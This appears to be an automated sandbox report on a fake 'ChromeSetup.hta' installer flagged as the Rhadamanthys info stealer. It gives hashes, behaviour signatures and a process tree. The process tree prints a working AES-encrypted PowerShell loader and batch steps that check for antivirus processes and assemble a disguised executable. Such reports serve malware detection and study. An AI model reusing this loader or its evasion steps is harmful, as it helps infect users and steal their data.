Analysis
-
max time kernel
1199s -
max time network
883s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
28-03-2024 03:03
Static task
static1
Behavioral task
behavioral1
Sample
ChromeSetup.hta
Resource
win10-20240221-en
Behavioral task
behavioral2
Sample
ChromeSetup.hta
Resource
win10v2004-20240319-en
Behavioral task
behavioral3
Sample
ChromeSetup.hta
Resource
win11-20240221-en
General
-
Target
ChromeSetup.hta
-
Size
140KB
-
MD5
d92c49ca712a0503de3e182f66e3dcba
-
SHA1
97f716142447128859561a75e4677f978aca7fad
-
SHA256
908ca27ec447937b2f97fd4053a8fea99f45bc7e2eb028152f2301c97f952acf
-
SHA512
fdc26a2aa4f935286f77d04538bef4e7d0a3f99fec2a85544b5ab086ba1ab0fa758332f4aea26ea5f7e57f4bdb30854d64fd760e38d2bc2b31b414a97392b4e1
-
SSDEEP
768:p+/unhi1zOzZ+/unhi1zOzpBG3uJ1zxTg+/unhi1zOzxM+/unhi1zOz:pti5OzZti5OzpB91tgti5Ozati5Oz
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
Donations.pifdescription pid Process procid_target PID 4312 created 3112 4312 Donations.pif 50 -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 2 4088 powershell.exe 5 4088 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
ChromeSetup.exeDonations.pifpid Process 1272 ChromeSetup.exe 4312 Donations.pif -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target Process procid_target 3388 4312 WerFault.exe 93 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid Process 676 tasklist.exe 4044 tasklist.exe -
Processes:
AcroRd32.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-313240725-3527728709-4038673254-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exeDonations.pifAcroRd32.exedialer.exepid Process 4088 powershell.exe 4088 powershell.exe 4088 powershell.exe 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 4312 Donations.pif 4312 Donations.pif 1244 dialer.exe 1244 dialer.exe 1244 dialer.exe 1244 dialer.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetasklist.exetasklist.exedescription pid Process Token: SeDebugPrivilege 4088 powershell.exe Token: SeDebugPrivilege 676 tasklist.exe Token: SeDebugPrivilege 4044 tasklist.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
AcroRd32.exeDonations.pifpid Process 484 AcroRd32.exe 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Donations.pifpid Process 4312 Donations.pif 4312 Donations.pif 4312 Donations.pif -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
AcroRd32.exepid Process 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe 484 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
mshta.exepowershell.exeChromeSetup.exeAcroRd32.exeRdrCEF.exedescription pid Process procid_target PID 4416 wrote to memory of 4088 4416 mshta.exe 72 PID 4416 wrote to memory of 4088 4416 mshta.exe 72 PID 4416 wrote to memory of 4088 4416 mshta.exe 72 PID 4088 wrote to memory of 484 4088 powershell.exe 74 PID 4088 wrote to memory of 484 4088 powershell.exe 74 PID 4088 wrote to memory of 484 4088 powershell.exe 74 PID 4088 wrote to memory of 1272 4088 powershell.exe 75 PID 4088 wrote to memory of 1272 4088 powershell.exe 75 PID 4088 wrote to memory of 1272 4088 powershell.exe 75 PID 1272 wrote to memory of 3692 1272 ChromeSetup.exe 77 PID 1272 wrote to memory of 3692 1272 ChromeSetup.exe 77 PID 1272 wrote to memory of 3692 1272 ChromeSetup.exe 77 PID 484 wrote to memory of 1036 484 AcroRd32.exe 76 PID 484 wrote to memory of 1036 484 AcroRd32.exe 76 PID 484 wrote to memory of 1036 484 AcroRd32.exe 76 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 1396 1036 RdrCEF.exe 79 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80 PID 1036 wrote to memory of 4084 1036 RdrCEF.exe 80
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵PID:3112
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1244
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ChromeSetup.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function TLcToxJS($Imjw){return -split ($Imjw -replace '..', '0x$& ')};$eGLbfA = TLcToxJS('88713C0E6345BF6F01234702EC33828DDF2378F0EB28C8C270C3C536F77F2A54D7C551CF332C7EFBAF6008BFF77DA8394D3473142E76214843C7E2728213CE6C97DE8B20BE13ABE17961072C4BEB4AF63EE7E46FC28FAF8FBAB114708D65DA81E5E0ED6AF7D726C17278A48BEC42EC6BBE58DF4595E510DF26A125762D63550A3000230E2088A014B6E1C6C14C2820693207376F17572345B88EC7F724E177A87B0213D1AC159F23E2B4B8D62637C9C52EE0C61AF3F759CE95D4CCFDDF0A2920F9BE9528C53A00FA3E5E072D939A82148E1776937E0D3EE2417D96EB758AB281FBA019DD2FA30AC300F00A6F4948DFD2D169927C6877A7588F5C44E400419BD6307661915A781BDB5C8206A73196CDE95289A3349017F0A372F159A386104D96295F3F438637717852645E0A13E68B91D1C9DCC32199E06F03D3F18182C07AE06CFD02653A671F7F90E597264B1AB8630350388A281494A22166BCB1E37F99F9EE48E74940CA6C5664AA1C448238D37ABFE7BE981A0A4E70DC3B0DDFC66538A07BC735D13C2A030C1F254D3232CA5BD9E70858BDE03361E3A65FC4F06D462EAF5EC013F2C34DE3ECD079C2FB4A4B03C10C5C2B4EC7B6F86FC6CE2456855E39C9EE5FC9C630D415D23ADED57DD934EDA90E63224A16BF4E09F979802D9AE10954F5BD3B5578A6C00AA970D90E4785E80AEAE49317C95D54C1B08E1CC832B6F70717511068D683A1255FD896F64ABAA25551AD9668C3BF7378E17F68C6EDDBA093F48BE9FCB33545BB8E1D155B3433F5F36CEB9331DED5F64C86B2134F57C4A43C62273B2BE22CF9FFC0738F919E86116A5450C795807EE8877F1DBD799496CCF6739DACB0F81EF980F33800C6F5666CC22C574E394123A5A09FD9C660B1F295B3527FD32F61858CCB3369A181B1532D9BFD6833EB6F6D3F65D514F38472B577FB8C988FD2C8652F8F46F507A7CBA0FD6608864F30653D030DC31D049A5D0563BA61A2EFBAA8BB4825655A24C0CD4E1B9370628A4231400F6458CD6E70274AA26C4C08074C7D9A9D10DEABFF20861561FBBDA361C1140EE331F0467C225AB79BB530FADE7B415F60EA39D9C0943627996F318DF6EED8076C4C5DCB604FF6441C32A0196836C1394C79F28CD6A6EA1116FE9F0E10B6BAF9884B9D8E1AFB0162E467C4AAEE322A536D223430EADE38BC4267B3DEF3F964495B1C40A083D4E0C1F248825C62DCC7995C4870848F86637A32C271D202C5F98CC839D02847FB6857CE5A8E00DDA8B74B66E15115AD1BD6174AB6A160427FFAA1F33FF268D51253FC1C4163F0C7A2F65DC993B3DE547C7A510AF2C2A75A06398041402E9B8A7DEC77D052B922B59A7B608D95DF41CF8C3D9B25062BA3D357C54BF29264105D3F47E285C4667440C9D95C33594DA1D64F157A5C9DF920F92BF4CDABAAEC1C9E63459CDC18164C0D8E7A028941C06483663379FC6E20727DA1799FB7FEC57F45CE3DAE1DE32B38162DA998F7345141B34F6A32CA80860A6AE45D73FDDE1BFFF7A3E35966226200D6FEDB2F5F55A6D15F4E6E10A42EE2AF5EF1AB59D5156FAF3EFE1D267E3562417FB3741FEC879A432B8B25A0C804213FFB17AD28D77B52B3401862CF5D8A79B3815F08361F0690375F1444A5652755241B7B4C76E7B42BC96CBC4AC7DD4DE115175DFCBA5B484D4B254BA0A3C3A24874E3D90347F7EA8DA46AC7B123E8B9');$xBQDa = [System.Security.Cryptography.Aes]::Create();$xBQDa.Key = TLcToxJS('466371524D774563634159445A6A426E');$xBQDa.IV = New-Object byte[] 16;$PuTlXHvG = $xBQDa.CreateDecryptor();$BgiNlDJqW = $PuTlXHvG.TransformFinalBlock($eGLbfA, 0, $eGLbfA.Length);$HxMgCSafi = [System.Text.Encoding]::Utf8.GetString($BgiNlDJqW);$PuTlXHvG.Dispose();& $HxMgCSafi.Substring(0,3) $HxMgCSafi.Substring(3)2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\sample.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:484 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=36D70632AA851B14B1421659DEBD8B5C --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1396
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=C077458945434E8DCFED89F002513B1F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=C077458945434E8DCFED89F002513B1F --renderer-client-id=2 --mojo-platform-channel-handle=1624 --allow-no-sandbox-job /prefetch:15⤵PID:4084
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=233ED1007F039B36D6EB8288D353A82F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=233ED1007F039B36D6EB8288D353A82F --renderer-client-id=4 --mojo-platform-channel-handle=2212 --allow-no-sandbox-job /prefetch:15⤵PID:1616
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D5A56533E4261D4CEAC64607455EC515 --mojo-platform-channel-handle=2592 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4940
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9BAF8A1DF7A0F5A6C6E189D836DCAE4B --mojo-platform-channel-handle=1820 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4292
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DE6FACF4065766378474D72FA6A13CB6 --mojo-platform-channel-handle=2664 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2360
-
-
-
-
C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"C:\Users\Admin\AppData\Roaming\ChromeSetup.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Bathrooms Bathrooms.bat & Bathrooms.bat & exit4⤵PID:3692
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵PID:2368
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4044
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:3372
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 131375⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Compound + Injection + Emotions + Worm + Participants 13137\Donations.pif5⤵PID:3172
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Src + Expressions + Safari + Treasury 13137\x5⤵PID:4100
-
-
C:\Users\Admin\AppData\Local\Temp\13137\Donations.pif13137\Donations.pif 13137\x5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4312 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 8206⤵
- Program crash
PID:3388
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.15⤵
- Runs ping.exe
PID:1808
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD5164700537a959d39255f23a6dbefec5f
SHA1890a015eec38bc2400ae4ea2243e074046e3ed67
SHA256ef46258f0d3520b6a36f20761ed791f86f136a08e23cd62d12d121abb5cb558a
SHA512d731484d67355d90eaa9d170bfc923e61db04de04b4cfc8210925542e7b5bbdedbdea38c3930252d11d27c39b8cf09f8617f08196b1cf3281bec0c8e60ded224
-
Filesize
872KB
MD56ee7ddebff0a2b78c7ac30f6e00d1d11
SHA1f2f57024c7cc3f9ff5f999ee20c4f5c38bfc20a2
SHA256865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4
SHA51257d56de2bb882f491e633972003d7c6562ef2758c3731b913ff4d15379ada575062f4de2a48ca6d6d9241852a5b8a007f52792753fd8d8fee85b9a218714efd0
-
Filesize
256KB
MD5392d802dbc227d64ba4bdcdb40775e25
SHA1c1c948e5cf0cd5687d3d0219691f7c4158d17eb4
SHA256e4ce8f221087420d11e996777e431f03e71c33aabc8afeee4d92a4ff23af6814
SHA512ae7f6e0345cc1f3ccf0ae24efa4bd2b0de811e416dc3ebc7eb5bd8915bbd81cefff23f76e030a220f0288988ed6c841408b6a6f03fe646dce8c887b7786344b1
-
Filesize
832KB
MD5d9e9c479fdec2481169f89707eaa9cbb
SHA19e693b2846ae226fbb3b3d246c014ed6dbb05b16
SHA25681fdebd186915713be0d402ac5a408a2f6394ee5d6e3bca53ad9acb94ec33cf2
SHA5124a63c7d2e434e8bff44638d6d165ee4f6a01293f61c0fe64a57468277b071cff731c5615d2b1f17ad33a0c44466c79110ec9ffb8c1a5f40fc0596fa5c8cfd498
-
Filesize
13KB
MD5b51276964bb7d7ced0ca782c1505d9ca
SHA1961d8f2ed348d6bfe38f109e97ab8b55db14591c
SHA25655cc097b9fcc03fd4c728618889b48973ed7bcf36057edd819ef475f4aca9403
SHA512fd485c564a64fdb53546c5ddee7dbd52fffea81405d81f49d3a7e1081f892f720120448ecb11190623e7e909683170ece6abaea090cdc857b62b17f1a9d2c547
-
Filesize
280KB
MD5d63c5479fd18f86817d489744a338751
SHA182385a52bb5485fab0a3d1e7f9a3661bf35d3098
SHA2563f7aa56dfd875ebf6e3aa86be897f65302f88e4022cf2dc984fdb4ac9cff0037
SHA512da8a157239ef59e683b2ad06492136cfc52550af0947bb812fc7795f02ab0e09cf510b701a9e247b0ec197879028778a0af8daf01589d1a53090aa4f91bf0361
-
Filesize
139KB
MD5569505062321992f4e2803461c40e724
SHA1b62f7987f92b4397b02b6894e759096fdee1f7db
SHA256748a3b063eff70ed5ba8a3a2590f409e5ec79d84d402abae5bb26b42e204e434
SHA5122d23a0322100f570f2298230338c68bd23b683cae2e9a0f27bd5098a6f1c15699d3ba77a319786df34a60739a79f863adb190b6c3aa5fbc06030ae1872cb71fd
-
Filesize
278KB
MD56ff11c454a1191120b1f963b120ae6b1
SHA19476d445caccd7a725836c102154e4ba17cbc969
SHA256b0ba9def393d4b5c8f560143c57b6c6a88a057c0291515ade7fa8fb195e03898
